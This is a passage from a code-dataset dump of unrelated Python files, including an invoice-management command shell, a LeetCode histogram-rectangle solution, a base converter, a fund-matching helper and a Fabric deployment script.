graph.terminate()\n return\n\n\nclass Graph():\n def __init__(self, head=None):\n self.heads = []\n if head:\n self.add_head(head)\n self.master_control_block = MasterControlBlock()\n self.master_control_block.set_input_data('graph', self)\n\n def add_head(self, block):\n self.heads.append(block)\n\n def set_termination_condition(self, source_block, source_channel):\n connect(source_block, source_channel, self.master_control_block, 'continue')\n\n def run(self, start=None, end=None):\n # TODO: It would be a good optimization to make sure that is X is upstream of Y, X has the opportunity to\n # run first in any given iteration. This is an optimization, not a requirement (but it turns out to be really\n # easy to create bugs in the logic in the block step() method that are resolved if this is a requirement).\n run_set = set()\n for head in self.heads:\n run_set.add(head)\n head.set_start(start)\n head.set_end(end)\n while run_set: # Run through multiple iterations of entire graph\n while run_set: # Run through a single iteration of entire graph\n block = run_set.pop()\n for downstream_block in block.step():\n run_set.add(downstream_block)\n for head in self.heads:\n if not head.terminated():\n head.increment_time()\n run_set.add(head)\n\n\ndef connect(source_block, source_channel_name, destination_block, destination_channel_name):\n channel = source_block.get_output_channel(source_channel_name)\n destination_block.set_input_channel(destination_channel_name, channel)\n","sub_path":"conduit/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":27648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"587149688","text":"# 给定 n 个非负整数,用来表示柱状图中各个柱子的高度。每个柱子彼此相邻,且宽度为 1 。 \n# \n# 求在该柱状图中,能够勾勒出来的矩形的最大面积。 \n# \n# \n# \n# \n# \n# 以上是柱状图的示例,其中每个柱子的宽度为 1,给定的高度为 [2,1,5,6,2,3]。 \n# \n# \n# \n# \n# \n# 图中阴影部分为所能勾勒出的最大矩形面积,其面积为 10 个单位。 \n# \n# \n# \n# 示例: \n# \n# 输入: [2,1,5,6,2,3]\n# 输出: 10 \n# Related Topics 栈 数组 \n# 👍 899 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n\n # \"\"\"\n # 枚举左右边界 超时\n # \"\"\"\n #\n # length = len(heights)\n # maxVal = 0\n # for i in xrange(length):\n # minHeight = float(\"inf\")\n # for j in range(i,length):\n # minHeight = min(minHeight, heights[j])\n # maxVal = max(maxVal, (j-i+1)*minHeight)\n #\n # return maxVal\n\n \"\"\"\n \n \"\"\"\n new_len = len(heights) + 2\n newHeights = [0] * new_len\n newHeights[1:-1] = heights[:]\n\n maxArea = 0\n stack = [0]\n for i in range(1, new_len):\n while stack and newHeights[stack[-1]] > newHeights[i]:\n height = newHeights[stack.pop()]\n while stack and newHeights[stack[-1]] == height:\n stack.pop()\n width = i - stack[-1] - 1 if stack else i\n maxArea = max(maxArea, height * width)\n stack.append(i)\n\n return maxArea\n\n \"\"\" \n 左边看一下,看最多能向左延伸多长,找到大于等于当前柱形高度的最左边元素的下标;\n 右边看一下,看最多能向右延伸多长;找到大于等于当前柱形高度的最右边元素的下标。\n \"\"\"\n\n \n # n = len(heights)\n # left, right = [0] * n, [n] * n\n #\n # mono_stack = list()\n # for i in range(n):\n # while mono_stack and heights[mono_stack[-1]] >= heights[i]:\n # right[mono_stack[-1]] = i\n # mono_stack.pop()\n # left[i] = mono_stack[-1] if mono_stack else -1\n # mono_stack.append(i)\n #\n # ans = max((right[i] - left[i] - 1) * heights[i] for i in range(n)) if n > 0 else 0\n # return ans\n\n\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"week01/[84]柱状图中最大的矩形.py","file_name":"[84]柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"159289204","text":"#!/usr/bin/python3 -O\n# pylint: disable=unused-argument,no-self-use,attribute-defined-outside-init\n\nimport argparse\nimport cmd\nimport datetime\nimport decimal\nimport os\nimport pdb\nimport shlex\nimport subprocess\n\nimport dateutil.parser\nimport sqlalchemy.orm.exc\n\nimport invoice\nimport invoice.db\n\nclass ArgCmd(cmd.Cmd):\n def parseline(self, line):\n \"\"\"Parse the line into a command name and a string containing\n the arguments. Returns a tuple containing (command, args, line).\n 'command' and 'args' may be None if the line couldn't be parsed.\n\n If there is attribute parser_*, args are returned as\n argparse.Namespace as parsed by respective parser.\n \"\"\"\n\n line = line.strip()\n if not line:\n return None, None, line\n elif line[0] == '?':\n line = 'help ' + line[1:]\n elif line[0] == '!':\n if hasattr(self, 'do_shell'):\n line = 'shell ' + line[1:]\n else:\n return None, None, line\n i, n = 0, len(line)\n while i < n and line[i] in self.identchars:\n i = i+1\n command, arg = line[:i], line[i:].strip()\n try:\n arg = getattr(self, 'parser_'+command).parse_args(shlex.split(arg))\n except AttributeError:\n pass\n except SystemExit:\n return command, None, line\n return command, arg, line\n\n def onecmd(self, line):\n \"\"\"Interpret the argument as though it had been typed in response\n to the prompt.\n\n This may be overridden, but should not normally need to be;\n see the precmd() and postcmd() methods for useful execution hooks.\n The return value is a flag indicating whether interpretation of\n commands by the interpreter should stop.\n\n \"\"\"\n command, arg, line = self.parseline(line)\n if not line:\n return self.emptyline()\n if arg is None:\n return False\n if command is None:\n return self.default(line)\n self.lastcmd = line\n if line == 'EOF':\n self.lastcmd = ''\n if command == '':\n return self.default(line)\n else:\n try:\n func = getattr(self, 'do_' + command)\n except AttributeError:\n return self.default(line)\n return func(arg)\n\n def do_help(self, arg):\n 'Show this help'\n if arg:\n if not hasattr(self, 'do_' + arg):\n self.stdout.write('No such command: {}\\n'.format(arg))\n return\n if hasattr(self, 'parser_' + arg):\n self.stdout.write(getattr(self, 'parser_'+arg).format_help())\n return\n if getattr(self, 'do_'+arg).__doc__:\n self.stdout.write(getattr(self, 'do_'+arg).__doc__ + '\\n')\n return\n self.stdout.write('No help for {}.\\n'.format(arg))\n else:\n self.stdout.write('Available commands:\\n')\n for command in sorted(name[3:]\n for name in self.get_names() if name.startswith('do_')):\n if command == 'EOF':\n continue\n description = None\n if hasattr(self, 'parser_' + command):\n description = getattr(self, 'parser_' + command).description\n if not description:\n description = getattr(self, 'do_' + command).__doc__\n if description and '\\n' in description:\n description = description[description.find('\\n')]\n if description:\n self.stdout.write(\n ' {:10s} {}\\n'.format(command, description))\n else:\n self.stdout.write(' {:10s}\\n'.format(command))\n self.stdout.write('\\nType `help COMMAND` or `COMMAND -h`'\n ' to get help about a particular command.\\n\\n')\n\n def do_pdb(self, arg):\n 'Break to PDB debugger.'\n pdb.set_trace()\n\n @staticmethod\n def cmderror(parser, msg):\n try:\n parser.error(msg)\n except SystemExit:\n pass\n\n\nclass CmdProduct(ArgCmd):\n def preloop(self):\n self.prompt = 'product {}> '.format(self.product.code)\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show product summary.')\n def do_show(self, args):\n print(str(self.product))\n\n parser_name = argparse.ArgumentParser(prog='name',\n description='Change product name.')\n parser_name.add_argument('name', help='New name')\n def do_name(self, args):\n self.product.name = args.name\n\n parser_unit = argparse.ArgumentParser(prog='unit',\n description='Change unit of measurement.')\n parser_unit.add_argument('unit', help='New unit')\n def do_unit(self, args):\n self.product.unit = args.unit\n\n parser_price = argparse.ArgumentParser(prog='price',\n description='Change unit price.')\n parser_price.add_argument('currency', help='Currency')\n parser_price.add_argument('price', help='New price')\n def do_price(self, args):\n self.product.set_price(args.currency, args.price)\n\n parser_bprice = argparse.ArgumentParser(prog='bprice',\n description='Change price to match given brutto unit price.')\n parser_bprice.add_argument('currency', help='Currency')\n parser_bprice.add_argument('bprice', help='New brutto price')\n def do_bprice(self, args):\n self.product.set_bprice(args.currency, args.bprice)\n\n parser_vat = argparse.ArgumentParser(prog='vat',\n description='Change VAT rate.')\n parser_vat.add_argument('vat', help='New vat')\n def do_vat(self, args):\n self.product.vat = args.vat\n\n parser_set = argparse.ArgumentParser(prog='set',\n description='Set attribute.')\n parser_set.add_argument('attr', choices=['name', 'unit', 'vat'],\n help='Attribute to change')\n parser_set.add_argument('value', help='New value')\n def do_set(self, args):\n setattr(self.product, args.attr, args.value)\n\n # TODO def complete_set\n\n parser_save = argparse.ArgumentParser(prog='save',\n description='Exit to parent menu saving changes.')\n def do_save(self, args):\n invoice.db.session.commit()\n return True\n\n parser_discard = argparse.ArgumentParser(prog='discard',\n description='Exit to parent menu discarding changes.')\n def do_discard(self, args):\n invoice.db.session.rollback()\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\nChoose `discard` or `save`; ^D does not work.\\n')\n\n\nclass CmdProducts(ArgCmd):\n prompt = 'products> '\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List all products.')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('products.txt').render(\n products=invoice.db.session.query(invoice.db.Product)))\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show product summary.')\n parser_show.add_argument('code', help='Product code')\n def do_show(self, args):\n self.stdout.write(str(invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one()) + '\\n')\n\n def complete_show(self, text, line, begidx, endidx):\n return sorted(code + ' '\n for code, in invoice.db.session.query(invoice.db.Product.code)\n if code.startswith(text))\n\n parser_add = argparse.ArgumentParser(prog='add',\n description='Add new product to the database')\n parser_add.add_argument('--unit', '-u', default='szt.',\n help='Unit of measurement [default: %(default)s]')\n\n# group = parser_add.add_mutually_exclusive_group(required=True)\n# group.add_argument('--price', '-p', type=float,\n# help='Unit price netto')\n# group.add_argument('--bprice', '-P', type=float,\n# help='Unit price brutto')\n# del group\n\n parser_add.add_argument('--vat', '-v', type=decimal.Decimal, default=23,\n help='VAT factor in %% [default: 23]')\n parser_add.add_argument('code', metavar='CODE',\n help='Product code')\n parser_add.add_argument('name', metavar='NAME',\n help='Product name')\n\n def do_add(self, args):\n if not args.code:\n self.cmderror(self.parser_add, 'code must not be empty')\n return\n\n try:\n invoice.db.session.add(invoice.db.Product(code=args.code,\n name=args.name, unit=args.unit, vat=args.vat))\n except Exception as e:\n invoice.db.session.rollback()\n self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n else:\n invoice.db.session.commit()\n\n parser_del = argparse.ArgumentParser(prog='del',\n description='Delete product from database.')\n parser_del.add_argument('code', help='Product code')\n def do_del(self, args):\n 'del -- delete product from the database'\n try:\n invoice.db.session.delete(invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one())\n except Exception as e:\n invoice.db.session.rollback()\n self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n else:\n invoice.db.session.commit()\n complete_del = complete_show\n\n parser_open = argparse.ArgumentParser(prog='open',\n description='Open a product for editing.')\n parser_open.add_argument('code', help='Product code')\n def do_open(self, args):\n cli = CmdProduct()\n try:\n cli.product = invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one()\n except sqlalchemy.orm.exc.NoResultFound:\n self.cmderror(self.parser_open,\n 'no such product: {!r}\\n'.format(args.code))\n return\n\n try:\n cli.cmdloop()\n except Exception: # as e:\n invoice.db.session.rollback()\n raise\n# self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n complete_open = complete_show\n\n parser_exit = argparse.ArgumentParser(prog='exit',\n description='Return to parent menu.')\n def do_exit(self, args):\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\n')\n return True\n\n\nclass CmdInvoice(ArgCmd):\n def preloop(self):\n self.prompt = 'invoice {}> '.format(self.invoice.number)\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show current invoice (equivalent to `ls`'\n ' with header and footer)')\n def do_show(self, args):\n self.stdout.write(str(self.invoice) + '\\n')\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List invoice contents (equivalent to `show`'\n ' without header and footer).')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('invoice.txt').render(\n invoice=self.invoice, short=True) + '\\n')\n\n parser_add = argparse.ArgumentParser(prog='add',\n description='Add new line to invoice')\n\n group = parser_add.add_mutually_exclusive_group()\n group.add_argument('--price', '-p', type=decimal.Decimal,\n help='Unit price netto')\n group.add_argument('--bprice', '-P', type=decimal.Decimal,\n help='Unit price brutto')\n group.add_argument('--netto', '-n', type=decimal.Decimal,\n help='Total price netto')\n group.add_argument('--brutto', '-b', type=decimal.Decimal,\n help='Total price brutto')\n del group\n\n parser_add.add_argument('--vat', '-v', type=decimal.Decimal,\n help='VAT factor')\n parser_add.add_argument('product', metavar='PRODUCT',\n help='Product code')\n parser_add.add_argument('amount', metavar='AMOUNT', type=decimal.Decimal,\n help='Amount (in respective units)')\n\n def do_add(self, args):\n if not args.product:\n self.cmderror(self.parser_add, 'product must not be empty')\n return\n\n if not args.amount:\n self.cmderror(self.parser_add, 'amount must not be empty')\n return\n\n self.invoice.add_line(args.product, args.amount,\n price=args.price, bprice=args.bprice, netto=args.netto,\n brutto=args.brutto, vat=args.vat)\n\n parser_del = argparse.ArgumentParser(prog='del',\n description='Delete invoice line.')\n parser_del.add_argument('line', metavar='LINE', type=int,\n help='Line number.')\n def do_del(self, args):\n del self.invoice.lines[args.line - 1]\n\n def do_modify(self, args):\n pass\n\n parser_set = argparse.ArgumentParser(prog='set',\n description='Set attribute.')\n parser_set.add_argument('attr', choices=[\n 'currency',\n 'customer',\n 'deadline',\n 'delivered',\n 'grace',\n 'issued',\n ],\n help='Attribute to change')\n parser_set.add_argument('value', help='New value')\n def do_set(self, args):\n attr = args.attr\n if attr in ('currency', 'customer'):\n attr = attr + '_code'\n\n value = args.value\n if attr in ('delivered', 'issued'):\n value = dateutil.parser.parse(value)\n\n if attr == 'grace':\n value = int(value)\n setattr(self.invoice, attr, value)\n\n # TODO def complete_set\n\n parser_finalise = argparse.ArgumentParser(prog='finalise',\n description='Finalise invoice.')\n def do_finalise(self, args):\n self.invoice.finalise()\n return self.do_save(args)\n\n parser_finalize = parser_finalise\n do_finalize = do_finalise\n\n parser_products = argparse.ArgumentParser(prog='products',\n description='List products.')\n def do_products(self, args):\n self.stdout.write(invoice.env.get_template('products.txt').render(\n products=invoice.db.session.query(invoice.db.Product)))\n\n parser_save = argparse.ArgumentParser(prog='save',\n description='Exit to parent menu saving changes.')\n def do_save(self, args):\n invoice.db.session.commit()\n return True\n\n parser_discard = argparse.ArgumentParser(prog='discard',\n description='Exit to parent menu discarding changes.')\n def do_discard(self, args):\n invoice.db.session.rollback()\n return True\n\n def do_EOF(self, args):\n self.stdout.write(\n '\\nChoose `discard`, `save` or `finalise`; ^D does not work.\\n')\n\n# def do_debug(self, args):\n# pprint.pprint(self.invoice)\n# pprint.pprint(list(self.invoice))\n\n\nclass CmdInvoices(ArgCmd):\n intro = '''invoice {} Copyright (C) 2014-2015 Wojtek Porczyk\n\n This program comes with no warranty. This is free software,\n and you are welcome to redistribute it under certain conditions.\n See GPL-3 for details.\n'''.format(invoice.__version__)\n prompt = 'invoice> '\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List invoices.')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('invoices.txt').render(\n invoices=invoice.db.session.query(invoice.db.Invoice)) + '\\n')\n\n parser_products = argparse.ArgumentParser(prog='products',\n description='Edit products.')\n def do_products(self, args):\n 'products -- edit products database'\n CmdProducts().cmdloop()\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show invoice.')\n parser_show.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_show(self, args):\n self.stdout.write(str(invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()) + '\\n')\n\n def complete_show(self, text, line, begidx, endidx):\n return sorted(number + ' '\n for number, in invoice.db.session.query(invoice.db.Invoice.number)\n if number.startswith(text))\n\n parser_open = argparse.ArgumentParser(prog='open',\n description='Open invoice for editing.')\n parser_open.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_open(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n if inv.finalised:\n self.stdout.write(\n 'Invoice {0} is finalised. Editing is not possible.\\n'\n 'Try `show {0}` or `tex {0}`.\\n\\n'.format(inv.number))\n return\n cli = CmdInvoice()\n cli.invoice = inv\n cli.cmdloop()\n complete_open = complete_show\n\n parser_unfinalise = argparse.ArgumentParser(prog='unfinalise',\n description='Unfinalise invoice.')\n parser_unfinalise.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_unfinalise(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n inv.unfinalise()\n invoice.db.session.commit()\n complete_unfinalise = complete_show\n\n parser_new = argparse.ArgumentParser(prog='new',\n description='Create new invoice')\n parser_new.add_argument('--delivered', '-d', metavar='YYYY-MM-DD',\n dest='delivered',\n type=dateutil.parser.parse, default=datetime.date.today(),\n help='Date of delivery')\n parser_new.add_argument('--issued', '-i', metavar='YYYY-MM-DD',\n dest='issued',\n type=dateutil.parser.parse, default=datetime.date.today(),\n help='Date of issue')\n parser_new.add_argument('--customer', '-c', default='ALX',\n help='Customer identificator')\n parser_new.add_argument('number', metavar='NUMBER',\n help='Number of the invoice')\n parser_new.add_argument('currency', metavar='CURRENCY',\n help='Currency of the invoice')\n parser_new.add_argument('spec', metavar='SPEC', nargs='*', default=[],\n help='Line specification in format'\n ' ,[,{price|bprice|netto|brutto}=][,vat=]')\n\n def do_new(self, args):\n inv = invoice.db.Invoice(\n number=args.number,\n currency_code=args.currency,\n customer_code=args.customer,\n delivered=args.delivered,\n issued=args.issued)\n for spec in args.spec:\n inv.add_line_from_spec(spec)\n\n invoice.db.session.add(inv)\n invoice.db.session.flush()\n\n cli = CmdInvoice()\n cli.invoice = inv\n cli.cmdloop()\n\n parser_del = argparse.ArgumentParser(prog='del',\n description='Delete an invoice from the database.')\n parser_del.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_del(self, args):\n 'del -- delete invoice from the database'\n invoice.db.session.delete(invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one())\n invoice.db.session.commit()\n complete_del = complete_show\n\n parser_pdf = argparse.ArgumentParser(prog='pdf',\n description='Create PDF using ConTeXt.')\n parser_pdf.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n parser_pdf.add_argument('locale', metavar='LOCALE',\n nargs='?', choices=('pl_PL', 'en_GB'),\n help='Invoice language.')\n def do_pdf(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n texfile = invoice.config.get_invoice_file(inv.number, '.tex')\n\n open(texfile, 'w').write(inv.tex(args.locale))\n result = subprocess.call(\n ['context', '--batch', '--noconsole', texfile],\n cwd=invoice.config.invoicespath)\n\n try:\n os.unlink(invoice.config.get_invoice_file(inv.number, '.tuc'))\n except:\n pass\n try:\n os.unlink(invoice.config.get_invoice_file(inv.number, '.log'))\n except:\n pass\n\n if result:\n self.stdout.write('Creating PDF failed.\\n\\n')\n return False\n\n complete_pdf = complete_show\n\n parser_display = argparse.ArgumentParser(prog='tex',\n description='Display PDF.')\n parser_display.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_display(self, args):\n if self.do_pdf(args) is False:\n return\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n pdffile = invoice.config.get_invoice_file(inv.number, '.pdf')\n subprocess.call(['evince', pdffile])\n complete_display = complete_show\n\n# parser_sign = argparse.ArgumentParser(prog='sign',\n# description='Create signed invoice.')\n# parser_sign.add_argument('number', metavar='NUMBER',\n# help='Invoice number.')\n# def do_sign(self, args):\n# invoice = Invoice(args.number).load(_db).load_lines(_db)\n# try:\n# asc = str(gnupg.GPG().sign(str(invoice) + '\\n', clearsign=True))\n# except:\n# self.stdout.write('Signing failed.\\n\\n')\n# return\n\n# filename = config.get_invoice_file(invoice.number, '.asc')\n# open(filename, 'w').write(asc)\n# self.stdout.write(asc + '\\n')\n# complete_sign = complete_show\n\n parser_customers = argparse.ArgumentParser(prog='customers',\n description='List customers.')\n def do_customers(self, args):\n self.stdout.write(invoice.env.get_template('customers.txt').render(\n customers=invoice.db.session.query(invoice.db.Customer)))\n\n parser_mail = argparse.ArgumentParser(prog='mail',\n description='Mail PDF with invoice to the contact e-mail address.')\n parser_mail.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_mail(self, args):\n # TODO integrate with customers from LDAP\n # TODO qubes-rpc\n if self.do_pdf(args) is False:\n return\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n pdffile = invoice.config.get_invoice_file(inv.number, '.pdf')\n subprocess.call(['mutt',\n '-s', 'Faktura VAT ' + inv.number,\n '-a', pdffile,\n '--', inv.customer.mail])\n complete_mail = complete_show\n\n parser_init = argparse.ArgumentParser(prog='init',\n description='Initialise database.')\n def do_init(self, args):\n# with open(os.path.expanduser(config.dbfilename), 'ab'):\n# pass\n invoice.db.init()\n\n parser_exit = argparse.ArgumentParser(prog='exit',\n description='Exit from invoice shell.')\n def do_exit(self, args):\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\n')\n return True\n\n# def do_debug(self, args):\n# pprint.pprint(Invoices(_db, index=True))\n\n\ndef main():\n import readline\n readline.set_completer_delims(\n ''.join(c for c in readline.get_completer_delims() if c not in '-/'))\n CmdInvoices().cmdloop()\n\nif __name__ == '__main__':\n main()\n\n# vim: ts=4 sts=4 sw=4 et\n","sub_path":"invoice/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":23147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389519699","text":"# Convert_base.cpp b4b3a70d8ab942579f85b4416f980d05831af969\nimport sys\nimport random\nimport string\n\n\n# @include\ndef convert_base(s, b1, b2):\n is_negative = s[0] == '-'\n x = 0\n for c in s[1 if is_negative else 0:]:\n x *= b1\n x += ord(c) - ord('0') if c.isdigit() else ord(c) - ord('A') + 10\n\n result = []\n while True:\n x, reminder = divmod(x, b2)\n result.append(chr(ord('A') + reminder - 10) if reminder >= 10 else chr(ord('0') + reminder))\n if x == 0:\n break\n\n if is_negative: # s is a negative number.\n result.append('-')\n\n return ''.join(reversed(result))\n# @exclude\n\n\ndef rand_int_string(length):\n if length == 0:\n return '0'\n ret = []\n if random.randint(0, 1) == 1:\n ret.append('-')\n ret.append(chr(random.randint(ord('1'), ord('9'))))\n for _ in range(length-1):\n ret.append(random.choice(string.digits))\n return ''.join(ret)\n\n\ndef main():\n if len(sys.argv) == 4:\n input_str = sys.argv[1]\n print(convert_base(input_str, int(sys.argv[2]), int(sys.argv[3])))\n assert input_str == convert_base(\n convert_base(input_str, int(sys.argv[2]), int(sys.argv[3])),\n int(sys.argv[3]), int(sys.argv[2]))\n else:\n for _ in range(1000):\n input_str = rand_int_string(random.randint(1, 9))\n base = random.randint(2, 16)\n print('input is %s, base1 = 10, base2 = %d, result = %s' %\n (input_str, base, convert_base(input_str, 10, base)))\n assert input_str == convert_base(convert_base(input_str, 10, base), base, 10)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"solutions/python/convert_base.py","file_name":"convert_base.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151331019","text":"# finds and applies correct fund based on user specified rules\r\nimport logging\r\n\r\nimport babelstore as db\r\n\r\n# create logger\r\nmodule_logger = logging.getLogger('babel_logger.fund')\r\n\r\n\r\ndef find_fund(library_id, funds_str, audn_id, matType_id, location_id):\r\n # retrieve branch id\r\n location_record = db.retrieve_record(\r\n db.Location,\r\n id=location_id)\r\n # seprates applied in the form funds\r\n fund_lst = funds_str.split('+')\r\n ids = set()\r\n\r\n for fund in fund_lst:\r\n # print 'fund', fund, 'branch_id', location_record.branch_id\r\n criteria = {'branch_match': False,\r\n 'matType_match': False,\r\n 'audn_match': False}\r\n fund_record = db.retrieve_record(\r\n db.Fund,\r\n library_id=library_id,\r\n code=fund)\r\n # fund_record.branches\r\n # fund_record.matTypes\r\n # fund_record.audns\r\n\r\n for fund_branch in fund_record.branches:\r\n if fund_branch.branch_id == location_record.branch_id:\r\n criteria['branch_match'] = True\r\n # print 'branch', criteria\r\n # fund_record = db.retrieve_all(\r\n # db.Fund,\r\n # 'matTypes',\r\n # library_id=library_id,\r\n # code=fund)\r\n for fund_matType in fund_record.matTypes:\r\n if fund_matType.matType_id == matType_id:\r\n criteria['matType_match'] = True\r\n # print 'matType', criteria\r\n # fund_record = db.retrieve_all(\r\n # db.Fund,\r\n # 'audns',\r\n # library_id=library_id,\r\n # code=fund)\r\n for fund_audn in fund_record.audns:\r\n if fund_audn.audn_id == audn_id:\r\n criteria['audn_match'] = True\r\n # print 'audn', criteria\r\n # print 'final', criteria\r\n\r\n if criteria['branch_match'] is True \\\r\n and criteria['matType_match'] is True \\\r\n and criteria['audn_match'] is True:\r\n ids.add(fund_record.id)\r\n\r\n if len(ids) == 1:\r\n return (True, list(ids)[0])\r\n elif len(ids) == 0:\r\n module_logger.exception(\r\n \"FUND: fund(s) (%s) not applicable for this type of material\" % fund_lst)\r\n return (False, 'not able to correctly aplly one of the funds')\r\n else:\r\n module_logger.exception('FUND: applied funds (%s) are not exclusive' % fund_lst)\r\n return (False, 'multiple fund matches, funds not exclusive')\r\n","sub_path":"fund_applicator.py","file_name":"fund_applicator.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"264532989","text":"from django.contrib import admin\nfrom .models import company,remarks\n# Register your models here.\n\n\nclass remarksInline(admin.StackedInline):\n model = remarks\n\nclass courseadmin(admin.ModelAdmin):\n inlines = [remarksInline,]\nadmin.site.register(company)\nadmin.site.register(remarks)","sub_path":"Diary_Portal/diary/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"90357136","text":"# Given two strings s and t , write a function to determine if t is an anagram of s.\n#\n# Example 1:\n#\n#\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n#\n#\n# Example 2:\n#\n#\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n#\n#\n# Note:\n# You may assume the string contains only lowercase alphabets.\n#\n# Follow up:\n# What if the inputs contain unicode characters? How would you adapt your solution to such case?\n#\n\n\nclass Solution:\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n ls = list(s)\n lt = list(t)\n ls.sort()\n lt.sort()\n return ls == lt\n \n","sub_path":"242-valid-anagram/valid-anagram.py","file_name":"valid-anagram.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399255126","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nThis file is used to make certain development tasks less annoying.\n\nTo take full advantage of it, you'll need Python, Fabric, Java, Ruby\nand Haml.\n\"\"\"\n\nfrom os.path import dirname, join, realpath\n\nfrom fabric.api import cd, env, local, put, run\n\n\n__author__ = 'Maciej Konieczny '\n\n\nREPO_DIR = dirname(realpath(__file__))\nDEMO_DIR = join(REPO_DIR, 'demo')\nPLUGIN_DIR = join(REPO_DIR, 'plugin')\n\nCOMPILER_PATH = join(REPO_DIR, 'closure-compiler/compiler.jar')\nPLUGIN_PATH = join(PLUGIN_DIR, 'jquery.typing.js')\nCOMPRESSED_PLUGIN_PATH = join(PLUGIN_DIR, 'jquery.typing.min.js')\n\n\nenv.hosts = ['narf.megiteam.pl']\n\n\ndef build():\n \"\"\"\n Create compressed version of the plugin and build demo.\n \"\"\"\n\n compress()\n demo()\n\n\ndef compress():\n \"\"\"\n Create compressed version of the plugin.\n \"\"\"\n\n # compress\n local('java -jar {0} --js={1} --js_output_file={2}'.format(\n COMPILER_PATH, PLUGIN_PATH, COMPRESSED_PLUGIN_PATH))\n\n # copy info comment from development version\n info = ''\n with open(PLUGIN_PATH) as f:\n for line in f:\n if line.startswith('//'):\n info += line\n\n # add info comment to compressed version\n if info:\n with open(COMPRESSED_PLUGIN_PATH) as f:\n compressed = f.read()\n\n with open(COMPRESSED_PLUGIN_PATH, 'w') as f:\n f.write(info + compressed)\n\n\ndef demo():\n \"\"\"\n Build demo.\n \"\"\"\n\n # copy compressed plugin\n local('cp {0} {1}'.format(COMPRESSED_PLUGIN_PATH, DEMO_DIR))\n\n # render haml\n haml = join(DEMO_DIR, 'demo.haml')\n html = join(DEMO_DIR, 'index.html')\n local('haml {0} > {1}'.format(haml, html))\n\n\ndef deploy():\n \"\"\"\n Update MegiTeam and push to GitHub.\n \"\"\"\n\n # update MegiTeam\n megi()\n\n # push to GitHub\n local('git push --tags')\n\n\ndef megi():\n \"\"\"\n Update MegiTeam.\n \"\"\"\n\n # archive demo\n archive_name = 'typing.tar.bz2'\n archive_path = '/tmp/' + archive_name\n with cd(DEMO_DIR):\n local('tar -cj --exclude *.haml -f {0} *'.format(archive_path))\n\n # set remote directory names\n main_dir = 'narf.pl/main/on-the-stage'\n typing_dir_name = 'jquery-typing'\n typing_dir = join(main_dir, typing_dir_name)\n\n # create jQuery-typing directory\n with cd(main_dir):\n run(\"\"\"if [ -d {0} ]; then\n rm -rf {0}/*\n else\n mkdir {0}\n fi\"\"\".format(typing_dir_name))\n\n # upload\n put(archive_path, typing_dir)\n\n # extract and remove remote archive\n with cd(typing_dir):\n run('tar xf ' + archive_name)\n run('rm ' + archive_name)\n\n # remove local archive\n local('rm ' + archive_path)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236611328","text":"import numpy as 